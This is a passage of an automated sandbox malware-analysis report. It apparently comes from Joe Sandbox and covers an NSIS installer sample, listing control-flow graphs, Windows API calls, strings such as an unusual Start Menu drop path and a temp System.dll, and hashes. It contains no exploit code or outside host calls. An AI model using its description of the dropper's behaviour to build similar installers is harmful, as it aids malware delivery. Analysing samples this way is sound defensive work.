4041e9-4041ef call 40140b 323->326 327 4041fe-404207 call 40140b 323->327 334 4041f5 326->334 327->290 336 404209-404213 327->336 334->316 336->334 342 4043d1-4043d2 338->342 343 4043d4 338->343 339->338 344 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 342->344 343->344 345 404406-404417 SendMessageW 344->345 346 404419 344->346 347 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 345->347 346->347 347->288 358 404464-404466 347->358 358->288 359 40446c-404470 358->359 360 404472-404478 359->360 361 40448f-4044a3 DestroyWindow 359->361 360->287 362 40447e-404484 360->362 361->291 363 4044a9-4044d6 CreateDialogParamW 361->363 362->288 364 40448a 362->364 363->291 365 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 363->365 364->287 365->287 370 404535-40454d ShowWindow call 404610 365->370 370->291
                                                                APIs
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                • ShowWindow.USER32(?), ref: 00404121
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                • DestroyWindow.USER32 ref: 00404160
                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
                                                                • GetDlgItem.USER32(?,?), ref: 00404198
                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                • GetDlgItem.USER32(?,00000001), ref: 0040425E
                                                                • GetDlgItem.USER32(?,00000002), ref: 00404268
                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404282
                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                • GetDlgItem.USER32(?,00000003), ref: 00404379
                                                                • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
                                                                • EnableWindow.USER32(?,?), ref: 004043C7
                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                • EnableMenuItem.USER32(00000000), ref: 004043E4
                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                • String ID: H7B
                                                                • API String ID: 121052019-2300413410
                                                                • Opcode ID: 2f4dad2f818047668635e16f952da299a81014d83ff1599baf972819d0fbfd0c
                                                                • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                                • Opcode Fuzzy Hash: 2f4dad2f818047668635e16f952da299a81014d83ff1599baf972819d0fbfd0c
                                                                • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 373 403d17-403d2f call 406a35 376 403d31-403d41 call 4065af 373->376 377 403d43-403d7a call 406536 373->377 385 403d9d-403dc6 call 403fed call 40603f 376->385 381 403d92-403d98 lstrcatW 377->381 382 403d7c-403d8d call 406536 377->382 381->385 382->381 391 403e58-403e60 call 40603f 385->391 392 403dcc-403dd1 385->392 397 403e62-403e69 call 4066a5 391->397 398 403e6e-403e93 LoadImageW 391->398 392->391 393 403dd7-403dff call 406536 392->393 393->391 403 403e01-403e05 393->403 397->398 401 403f14-403f1c call 40140b 398->401 402 403e95-403ec5 RegisterClassW 398->402 416 403f26-403f31 call 403fed 401->416 417 403f1e-403f21 401->417 406 403fe3 402->406 407 403ecb-403f0f SystemParametersInfoW CreateWindowExW 402->407 404 403e17-403e23 lstrlenW 403->404 405 403e07-403e14 call 405f64 403->405 411 403e25-403e33 lstrcmpiW 404->411 412 403e4b-403e53 call 405f37 call 406668 404->412 405->404 410 403fe5-403fec 406->410 407->401 411->412 415 403e35-403e3f GetFileAttributesW 411->415 412->391 419 403e41-403e43 415->419 420 403e45-403e46 call 405f83 415->420 426 403f37-403f51 ShowWindow call 4069c5 416->426 427 403fba-403fc2 call 40579d 416->427 417->410 419->412 419->420 420->412 434 403f53-403f58 call 4069c5 426->434 435 403f5d-403f6f GetClassInfoW 426->435 432 403fc4-403fca 427->432 433 403fdc-403fde call 40140b 427->433 432->417 440 403fd0-403fd7 call 40140b 432->440 433->406 434->435 438 403f71-403f81 GetClassInfoW RegisterClassW 435->438 439 403f87-403faa DialogBoxParamW call 40140b 435->439 438->439 443 403faf-403fb8 call 403c67 439->443 440->417 443->410
                                                                APIs
                                                                  • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                  • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                • lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403D98
                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,75923420), ref: 00403E18
                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403E36
                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning), ref: 00403E7F
                                                                  • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                • RegisterClassW.USER32(00429200), ref: 00403EBC
                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
                                                                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403F6B
                                                                • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403F78
                                                                • RegisterClassW.USER32(00429200), ref: 00403F81
                                                                • DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning$Call$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                • API String ID: 1975747703-1799503963
                                                                • Opcode ID: 220f140aa4de50ee9124e2eb98a4ec8a38239a674bfba3edeef84c1295dabbb0
                                                                • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                • Opcode Fuzzy Hash: 220f140aa4de50ee9124e2eb98a4ec8a38239a674bfba3edeef84c1295dabbb0
                                                                • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 447 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 450 403120-403125 447->450 451 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 447->451 452 40336a-40336e 450->452 459 403243-403251 call 40302e 451->459 460 40315e 451->460 466 403322-403327 459->466 467 403257-40325a 459->467 461 403163-40317a 460->461 464 40317c 461->464 465 40317e-403187 call 4035e2 461->465 464->465 473 40318d-403194 465->473 474 4032de-4032e6 call 40302e 465->474 466->452 469 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 467->469 470 40325c-403274 call 4035f8 call 4035e2 467->470 498 4032d4-4032d9 469->498 499 4032e8-403318 call 4035f8 call 403371 469->499 470->466 493 40327a-403280 470->493 477 403210-403214 473->477 478 403196-4031aa call 406113 473->478 474->466 483 403216-40321d call 40302e 477->483 484 40321e-403224 477->484 478->484 496 4031ac-4031b3 478->496 483->484 489 403233-40323b 484->489 490 403226-403230 call 406b22 484->490 489->461 497 403241 489->497 490->489 493->466 493->469 496->484 502 4031b5-4031bc 496->502 497->459 498->452 507 40331d-403320 499->507 502->484 504 4031be-4031c5 502->504 504->484 506 4031c7-4031ce 504->506 506->484 508 4031d0-4031f0 506->508 507->466 510 403329-40333a 507->510 508->466 509 4031f6-4031fa 508->509 511 403202-40320a 509->511 512 4031fc-403200 509->512 513 403342-403347 510->513 514 40333c 510->514 511->484 515 40320c-40320e 511->515 512->497 512->511 516 403348-40334e 513->516 514->513 515->484 516->516 517 403350-403368 call 406113 516->517 517->452
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 004030E4
                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,00000400), ref: 00403100
                                                                  • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,80000000,00000003), ref: 0040615C
                                                                  • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,80000000,00000003), ref: 00403149
                                                                • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$uj)
                                                                • API String ID: 2803837635-398972744
                                                                • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 805 4066a5-4066b0 806 4066b2-4066c1 805->806 807 4066c3-4066d9 805->807 806->807 808 4066f1-4066fa 807->808 809 4066db-4066e8 807->809 810 406700 808->810 811 4068d5-4068e0 808->811 809->808 812 4066ea-4066ed 809->812 813 406705-406712 810->813 814 4068e2-4068e6 call 406668 811->814 815 4068eb-4068ec 811->815 812->808 813->811 816 406718-406721 813->816 814->815 818 4068b3 816->818 819 406727-406764 816->819 822 4068c1-4068c4 818->822 823 4068b5-4068bf 818->823 820 406857-40685c 819->820 821 40676a-406771 819->821 825 40685e-406864 820->825 826 40688f-406894 820->826 827 406773-406775 821->827 828 406776-406778 821->828 824 4068c6-4068cf 822->824 823->824 824->811 829 406702 824->829 830 406874-406880 call 406668 825->830 831 406866-406872 call 4065af 825->831 834 4068a3-4068b1 lstrlenW 826->834 835 406896-40689e call 4066a5 826->835 827->828 832 4067b5-4067b8 828->832 833 40677a-406798 call 406536 828->833 829->813 846 406885-40688b 830->846 831->846 836 4067c8-4067cb 832->836 837 4067ba-4067c6 GetSystemDirectoryW 832->837 847 40679d-4067a1 833->847 834->824 835->834 843 406834-406836 836->843 844 4067cd-4067db GetWindowsDirectoryW 836->844 842 406838-40683c 837->842 850 40683e-406842 842->850 851 40684f-406855 call 4068ef 842->851 843->842 849 4067dd-4067e5 843->849 844->843 846->834 848 40688d 846->848 847->850 852 4067a7-4067b0 call 4066a5 847->852 848->851 853 4067e7-4067f0 849->853 854 4067fc-406812 SHGetSpecialFolderLocation 849->854 850->851 855 406844-40684a lstrcatW 850->855 851->834 852->842 862 4067f8-4067fa 853->862 859 406830 854->859 860 406814-40682e SHGetPathFromIDListW CoTaskMemFree 854->860 855->851 859->843 860->842 860->859 862->842 862->854
                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067C0
                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                • lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                • API String ID: 4260037668-1230650788
                                                                • Opcode ID: a56a8a4d956183f5ceef7ff9e42496adb417aa599aaeb911d527621cdebcfcc9
                                                                • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                                • Opcode Fuzzy Hash: a56a8a4d956183f5ceef7ff9e42496adb417aa599aaeb911d527621cdebcfcc9
                                                                • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 863 40176f-401794 call 402da6 call 405fae 868 401796-40179c call 406668 863->868 869 40179e-4017b0 call 406668 call 405f37 lstrcatW 863->869 874 4017b5-4017b6 call 4068ef 868->874 869->874 878 4017bb-4017bf 874->878 879 4017c1-4017cb call 40699e 878->879 880 4017f2-4017f5 878->880 888 4017dd-4017ef 879->888 889 4017cd-4017db CompareFileTime 879->889 882 4017f7-4017f8 call 406133 880->882 883 4017fd-401819 call 406158 880->883 882->883 890 40181b-40181e 883->890 891 40188d-4018b6 call 4056ca call 403371 883->891 888->880 889->888 892 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 890->892 893 40186f-401879 call 4056ca 890->893 905 4018b8-4018bc 891->905 906 4018be-4018ca SetFileTime 891->906 892->878 927 401864-401865 892->927 903 401882-401888 893->903 907 402c33 903->907 905->906 909 4018d0-4018db CloseHandle 905->909 906->909 910 402c35-402c39 907->910 912 4018e1-4018e4 909->912 913 402c2a-402c2d 909->913 914 4018e6-4018f7 call 4066a5 lstrcatW 912->914 915 4018f9-4018fc call 4066a5 912->915 913->907 921 401901-402398 914->921 915->921 925 40239d-4023a2 921->925 926 402398 call 405cc8 921->926 925->910 926->925 927->903 928 401867-401868 927->928 928->893
                                                                APIs
                                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous,?,?,00000031), ref: 004017B0
                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous,?,?,00000031), ref: 004017D5
                                                                  • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                  • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8,004030A8,00422728,00000000,00000000,00000000), ref: 00405725
                                                                  • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsm3A84.tmp$C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous$Call
                                                                • API String ID: 1941528284-3221851754
                                                                • Opcode ID: f15c8198a6df89e73f827ceadb4c73dab8f562a39fed638654e43d91f01e6988
                                                                • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                • Opcode Fuzzy Hash: f15c8198a6df89e73f827ceadb4c73dab8f562a39fed638654e43d91f01e6988
                                                                • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 929 4069c5-4069e5 GetSystemDirectoryW 930 4069e7 929->930 931 4069e9-4069eb 929->931 930->931 932 4069fc-4069fe 931->932 933 4069ed-4069f6 931->933 935 4069ff-406a32 wsprintfW LoadLibraryExW 932->935 933->932 934 4069f8-4069fa 933->934 934->935
                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                • wsprintfW.USER32 ref: 00406A17
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                • API String ID: 2200240437-1946221925
                                                                • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 936 403479-4034a1 GetTickCount 937 4035d1-4035d9 call 40302e 936->937 938 4034a7-4034d2 call 4035f8 SetFilePointer 936->938 943 4035db-4035df 937->943 944 4034d7-4034e9 938->944 945 4034eb 944->945 946 4034ed-4034fb call 4035e2 944->946 945->946 949 403501-40350d 946->949 950 4035c3-4035c6 946->950 951 403513-403519 949->951 950->943 952 403544-403560 call 406bb0 951->952 953 40351b-403521 951->953 959 403562-40356a 952->959 960 4035cc 952->960 953->952 954 403523-403543 call 40302e 953->954 954->952 961 40356c-403574 call 40620a 959->961 962 40358d-403593 959->962 963 4035ce-4035cf 960->963 966 403579-40357b 961->966 962->960 965 403595-403597 962->965 963->943 965->960 967 403599-4035ac 965->967 968 4035c8-4035ca 966->968 969 40357d-403589 966->969 967->944 970 4035b2-4035c1 SetFilePointer 967->970 968->963 969->951 971 40358b 969->971 970->937 971->967
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 0040348D
                                                                  • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                • SetFilePointer.KERNELBASE(00296A75,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
